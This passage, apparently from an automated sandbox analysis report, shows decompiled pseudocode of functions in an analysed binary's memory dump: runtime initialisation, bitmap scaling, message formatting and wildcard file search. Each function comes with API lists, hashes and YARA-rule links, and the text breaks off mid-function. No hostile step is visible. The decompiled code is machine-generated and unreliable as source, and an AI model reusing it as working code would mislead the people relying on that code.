              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              • API String ID: 2633735394-0
              • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
              • Instruction ID: aa9f5f22af0e7de0ac306b6d7bf90a346362123258f4ffcf523d98c5f882ed31
              • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
              • Instruction Fuzzy Hash: CB01E932500109BBCF12AF95CC05EEA3BBAEF59754F154115FD5865121D372E8A2EBB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D915E6, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D915E6() {
				void* _t4;
				void* _t8;

				E00D929B7();
				E00D9294B();
				if(E00D9268E() != 0) {
					_t4 = E00D91726(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00D926CA();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





              0x00d915e6
              0x00d915eb
              0x00d915f7
              0x00d915fc
              0x00d91601
              0x00d91603
              0x00d9160e
              0x00d91605
              0x00d91605
              0x00000000
              0x00d91605
              0x00d915f9
              0x00d915f9
              0x00d915fb
              0x00d915fb

              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00D915E6
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00D915EB
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00D915F0
                • Part of subcall function 00D9268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00D9269F
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00D91605
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              • API String ID: 1761009282-0
              • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
              • Instruction ID: 93ade3633cceb69044a43feec7ec68312cba216d37fdffe455a91ed2e9f5ecff
              • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
              • Instruction Fuzzy Hash: 73C04C2C540653B01F503AB533137BD13108DA27C5B8B14C1BD92179175D05480B1832
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8975D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON
              Download Yara Rule
              C-Code - Quality: 51%
              			E00D8975D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				char _v112;
				intOrPtr _v116;
				intOrPtr* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v144;
				intOrPtr* _v152;
				intOrPtr _v156;
				intOrPtr* _v164;
				char _v180;
				intOrPtr* _v184;
				intOrPtr* _v192;
				intOrPtr* _v200;
				intOrPtr* _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				char _v228;
				intOrPtr _v232;
				void* __edi;
				signed int _t71;
				intOrPtr* _t77;
				void* _t78;
				intOrPtr* _t79;
				intOrPtr* _t81;
				short _t89;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				signed int _t103;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				signed int _t120;
				intOrPtr _t124;
				intOrPtr* _t132;
				intOrPtr* _t134;
				void* _t146;
				void* _t149;
				signed int _t152;
				void* _t154;
				long long* _t155;
				long long _t158;

				_t158 = __fp0;
				if(E00D8960F() != 0) {
					_t146 = _a4;
					GetObjectW(_t146, 0x18,  &_v68);
					_t152 = _v4;
					_t120 = _v0;
					asm("cdq");
					_t71 = _v72 * _t152 / _v76;
					if(_t71 < _t120) {
						_t120 = _t71;
					}
					_t149 = 0;
					_push( &_v112);
					_push(0xda33ac);
					_push(1);
					_push(0);
					_push(0xda417c);
					if( *0xdadff4() < 0) {
						L18:
						return _t146;
					} else {
						_t77 = _v132;
						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
						_t79 = _v152;
						if(_t78 >= 0) {
							_v144 = 0;
							_push( &_v144);
							_push(_t79);
							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
								_t81 = _v152;
								asm("fldz");
								_push(0);
								_t124 =  *_t81;
								_push(_t124);
								_push(_t124);
								 *_t155 = _t158;
								_push(0);
								_push(0);
								_push(0xda418c);
								_push(_v156);
								_push(_t81);
								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
									E00D8E920(_t146,  &_v136, 0, 0x2c);
									_v136 = 0x28;
									_v132 = _t152;
									_v120 = 0;
									_v128 =  ~_t120;
									_v124 = 1;
									_t89 = 0x20;
									_v122 = _t89;
									_t154 =  *0xdadedc(0,  &_v136, 0,  &_v180, 0, 0);
									asm("sbb ecx, ecx");
									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t132 = _v216;
										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
										_t101 = _v120;
										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
										_t103 = _v136;
										_push(_v232);
										_t134 = _v140;
										_v220 = _t103;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t120;
										_push(_t103 * _t120 << 2);
										_push(_v136 << 2);
										_push( &_v228);
										_push(_t134);
										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
											DeleteObject(_t154);
										} else {
											_t149 = _t154;
										}
										_t111 = _v164;
										 *((intOrPtr*)( *_t111 + 8))(_t111);
									}
									_t93 = _v212;
									 *((intOrPtr*)( *_t93 + 8))(_t93);
									_t95 = _v212;
									 *((intOrPtr*)( *_t95 + 8))(_t95);
									_t97 = _v224;
									 *((intOrPtr*)( *_t97 + 8))(_t97);
									if(_t149 != 0) {
										_t146 = _t149;
									}
									goto L18;
								}
								_t113 = _v184;
								 *((intOrPtr*)( *_t113 + 8))(_t113);
							}
							_t115 = _v192;
							 *((intOrPtr*)( *_t115 + 8))(_t115);
							_t79 = _v200;
						}
						 *((intOrPtr*)( *_t79 + 8))(_t79);
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00D89954();
			}
























































              0x00d8975d
              0x00d89767
              0x00d89782
              0x00d8978e
              0x00d89798
              0x00d8979f
              0x00d897a3
              0x00d897a4
              0x00d897aa
              0x00d897ac
              0x00d897ac
              0x00d897b3
              0x00d897b5
              0x00d897b6
              0x00d897be
              0x00d897bf
              0x00d897c0
              0x00d897cd
              0x00d89948
              0x00000000
              0x00d897d3
              0x00d897d3
              0x00d897e3
              0x00d897e8
              0x00d897ec
              0x00d897f9
              0x00d89803
              0x00d89804
              0x00d8980a
              0x00d8981c
              0x00d89820
              0x00d89822
              0x00d89823
              0x00d89825
              0x00d89826
              0x00d89827
              0x00d8982a
              0x00d8982b
              0x00d8982c
              0x00d89831
              0x00d89835
              0x00d8983b
              0x00d89851
              0x00d89859
              0x00d89863
              0x00d89869
              0x00d8986d
              0x00d89876
              0x00d8987b
              0x00d8987e
              0x00d89895
              0x00d8989b
              0x00d898a9
              0x00d898ab
              0x00d898b7
              0x00d898ba
              0x00d898cf
              0x00d898d2
              0x00d898d6
              0x00d898da
              0x00d898de
              0x00d898e5
              0x00d898e9
              0x00d898ed
              0x00d898f6
              0x00d89901
              0x00d89906
              0x00d89907
              0x00d8990d
              0x00d89914
              0x00d8990f
              0x00d8990f
              0x00d8990f
              0x00d8991a
              0x00d89921
              0x00d89921
              0x00d89924
              0x00d8992b
              0x00d8992e
              0x00d89935
              0x00d89938
              0x00d8993f
              0x00d89944
              0x00d89946
              0x00d89946
              0x00000000
              0x00d89944
              0x00d8983d
              0x00d89844
              0x00d89844
              0x00d8980c
              0x00d89813
              0x00d89816
              0x00d89816
              0x00d897f1
              0x00000000
              0x00d897f1
              0x00d897cd
              0x00d89769
              0x00d8976d
              0x00d89771
              0x00000000

              APIs
                • Part of subcall function 00D8960F: GetDC.USER32(00000000), ref: 00D89613
                • Part of subcall function 00D8960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D8961E
                • Part of subcall function 00D8960F: ReleaseDC.USER32(00000000,00000000), ref: 00D89629
              • GetObjectW.GDI32(?,00000018,?,00000000,?,76B95B70), ref: 00D8978E
                • Part of subcall function 00D89954: GetDC.USER32(00000000), ref: 00D8995D
                • Part of subcall function 00D89954: GetObjectW.GDI32(?,00000018,?,?,?,76B95B70,?,?,?,?,?,00D8977A,?,?,?), ref: 00D8998C
                • Part of subcall function 00D89954: ReleaseDC.USER32(00000000,?), ref: 00D89A20
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ObjectRelease$CapsDevice
              • String ID: (
              • API String ID: 1061551593-3887548279
              • Opcode ID: 7d0273fa4320645d41032eb0850a453457cce7fca813dbc05505a2d89e675c69
              • Instruction ID: e9586782f924cc154ee3523b4a0f55190a38a1fdd9404d7e24bbd03d68bcc1f2
              • Opcode Fuzzy Hash: 7d0273fa4320645d41032eb0850a453457cce7fca813dbc05505a2d89e675c69
              • Instruction Fuzzy Hash: 33611471208341AFD210EF64C894E6BBBE9FF89704F14491DF59ACB260D771E905CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D80A9F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
              Download Yara Rule
              C-Code - Quality: 17%
              			E00D80A9F(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x6f;
				if(_t47 > 0) {
					__eflags = _t26 - 0x7d;
					if(_t26 == 0x7d) {
						E00D8C339();
						_t28 = E00D7DA42(_t41, 0x96);
						return E00D89735( *0xdb75d8, E00D7DA42(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E00D7DA42(_t41));
						_push( *_t44);
						L19:
						_t32 = E00D8A57D();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M00D80D63))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E00D7DA42(__ecx, 0xc8) =  &_v516;
										__eax = E00D73E41( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E00D8A57D( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E00D7DA42(_t41);
							L7:
							_push(0);
							L8:
							return E00D8A57D();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M00D80D0B))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E00D89D55();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E00D7DA42(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E00D7DA42(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E00D7DA42(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}













              0x00d80a9f
              0x00d80aa9
              0x00d80aab
              0x00d80aae
              0x00d80ab1
              0x00d80cd8
              0x00d80cdb
              0x00d80cdd
              0x00d80ce9
              0x00000000
              0x00d80d00
              0x00d80ab7
              0x00d80ab7
              0x00d80cce
              0x00d80bfb
              0x00d80c00
              0x00d80c01
              0x00d80b3e
              0x00d80b3e
              0x00d80b07
              0x00000000
              0x00d80b07
              0x00d80abd
              0x00d80ac0
              0x00d80bc0
              0x00d80bc3
              0x00d80c83
              0x00d80c83
              0x00d80c86
              0x00d80cc4
              0x00000000
              0x00d80cc4
              0x00d80c88
              0x00d80c88
              0x00d80c8b
              0x00d80cbd
              0x00000000
              0x00d80cbd
              0x00d80c8d
              0x00d80c8d
              0x00d80c90
              0x00d80cb0
              0x00d80cb3
              0x00000000
              0x00d80cb3
              0x00d80c92
              0x00d80c92
              0x00d80c95
              0x00d80ca6
              0x00000000
              0x00d80ca6
              0x00d80c97
              0x00d80c97
              0x00d80c9a
              0x00d80c9c
              0x00000000
              0x00d80c9c
              0x00d80bc9
              0x00d80bc9
              0x00d80c7c
              0x00000000
              0x00d80c7c
              0x00d80bcf
              0x00d80bd2
              0x00d80bd5
              0x00d80bdb
              0x00000000
              0x00d80be2
              0x00000000
              0x00000000
              0x00d80bec
              0x00000000
              0x00000000
              0x00d80bf6
              0x00000000
              0x00000000
              0x00d80c08
              0x00000000
              0x00000000
              0x00d80c0c
              0x00000000
              0x00000000
              0x00d80c10
              0x00d80c13
              0x00000000
              0x00000000
              0x00d80c1a
              0x00000000
              0x00000000
              0x00d80c21
              0x00000000
              0x00000000
              0x00d80c28
              0x00d80c2b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d80c35
              0x00d80c38
              0x00000000
              0x00000000
              0x00d80c4d
              0x00d80c59
              0x00d80c5e
              0x00d80c61
              0x00d80c67
              0x00000000
              0x00000000
              0x00d80bdb
              0x00d80bd5
              0x00d80ac6
              0x00d80ac6
              0x00d80bb7
              0x00d80bb9
              0x00d80b5b
              0x00d80b5b
              0x00d80ae3
              0x00d80ae3
              0x00d80ae5
              0x00000000
              0x00d80aea
              0x00d80acf
              0x00d80ad5
              0x00000000
              0x00d80af2
              0x00d80af4
              0x00d80af9
              0x00000000
              0x00000000
              0x00d80adc
              0x00d80ade
              0x00000000
              0x00000000
              0x00d80b00
              0x00d80b02
              0x00000000
              0x00000000
              0x00d80b0d
              0x00d80b10
              0x00000000
              0x00000000
              0x00d80b1c
              0x00d80b1f
              0x00000000
              0x00000000
              0x00d80b23
              0x00d80b26
              0x00000000
              0x00000000
              0x00d80b2a
              0x00d80b2d
              0x00000000
              0x00000000
              0x00d80b34
              0x00d80b36
              0x00d80b3b
              0x00d80b3c
              0x00000000
              0x00000000
              0x00d80b46
              0x00d80b49
              0x00000000
              0x00000000
              0x00d80b4d
              0x00d80b50
              0x00000000
              0x00000000
              0x00d80b54
              0x00d80b56
              0x00000000
              0x00000000
              0x00d80b63
              0x00d80b65
              0x00000000
              0x00000000
              0x00d80b6c
              0x00d80b6f
              0x00000000
              0x00000000
              0x00d80b76
              0x00d80b79
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d80b80
              0x00d80b83
              0x00d80b8b
              0x00000000
              0x00000000
              0x00d80ba0
              0x00d80ba3
              0x00000000
              0x00000000
              0x00d80baa
              0x00d80bad
              0x00d80b12
              0x00d80b17
              0x00d80b18
              0x00000000
              0x00000000
              0x00d80ad5
              0x00d80acf
              0x00d80ac0
              0x00d80d09
              0x00d80d09

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _swprintf
              • String ID: %ls$%s: %s
              • API String ID: 589789837-2259941744
              • Opcode ID: f6f5757df8f1387f95cc6988e2205360beb073446121d2f7625c479c8392d8b6
              • Instruction ID: f3f432d0e0b63b9bcca719ceea30d3c57254489e0df7af3ed85e85b8aebbb493
              • Opcode Fuzzy Hash: f6f5757df8f1387f95cc6988e2205360beb073446121d2f7625c479c8392d8b6
              • Instruction Fuzzy Hash: E151BA3128C301FAE6A13FD48D46F367D59EB05B04F60C506B7DA644E2E5A1F8687736
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D99E43, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
              Download Yara Rule
              C-Code - Quality: 75%
              			E00D99E43(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				intOrPtr _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				signed int _t199;
				signed int _t201;
				union _FINDEX_INFO_LEVELS _t202;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				void* _t212;
				intOrPtr _t213;
				void* _t214;
				signed int _t218;
				void* _t220;
				signed int _t221;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				void* _t226;
				void* _t227;

				_t80 = _a8;
				_t223 = _t222 - 0x20;
				if(_t80 != 0) {
					_t207 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t198 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t207;
					if( *_t207 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t198;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t198;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t209;
						if(_t209 != 0) {
							_t196 = _t198;
							_t157 = _t159;
							do {
								_t183 =  *_t196;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t196 = _t196 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
								__eflags = _t144 - _t209;
							} while (_t144 != _t209);
							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t210 = E00D96F0C(_t190, _v8, 1);
						_t224 = _t223 + 0xc;
						__eflags = _t210;
						if(_t210 != 0) {
							_t87 = _t210 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t198 - _t150;
							if(_t198 == _t150) {
								L23:
								_t199 = 0;
								__eflags = 0;
								 *_a8 = _t210;
								goto L24;
							} else {
								_t93 = _t210 - _t198;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t198;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00D9DD71(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
									_t224 = _t224 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00D97DBB();
										asm("int3");
										_t220 = _t224;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t198);
										_t201 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
											_push(_t150);
											_t50 = _t201 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t212 = E00D97B1B(_t166, _t153, 1);
											_t168 = _t210;
											__eflags = _t201;
											if(_t201 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t201;
												_t108 = E00D9DD71(_t168, _t212 + _t201, _t153, _v0);
												_t225 = _t224 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E00D9A212(_a12, _t192, __eflags, _t212);
													E00D97A50(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t201);
												_t139 = E00D9DD71(_t168, _t212, _t153, _a4);
												_t225 = _t224 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00D97DBB();
													asm("int3");
													_push(_t220);
													_t221 = _t225;
													_t226 = _t225 - 0x150;
													_t111 =  *0xdad668; // 0x9e43e7e4
													_v116 = _t111 ^ _t221;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t212);
													_t213 = _v96;
													_push(_t201);
													_v440 = _t213;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E00D9DDC0(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t202 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E00D8E920(_t202,  &_v336, _t202, 0x140);
														_t227 = _t226 + 0xc;
														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
														_t123 = _v340;
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
																	_t227 = _t227 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t214,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t194 =  *_t123;
															_t178 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E00D95030(_t154, _t202, _t214, _t194 + _t178 * 4, _t131 - _t178, 4, E00D99E2B);
															}
														} else {
															_push(_t123);
															_push(_t202);
															_push(_t202);
															_push(_t154);
															L28();
															L54:
															_t202 = _t123;
														}
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															FindClose(_t214);
														}
														_t124 = _t202;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t213);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t221;
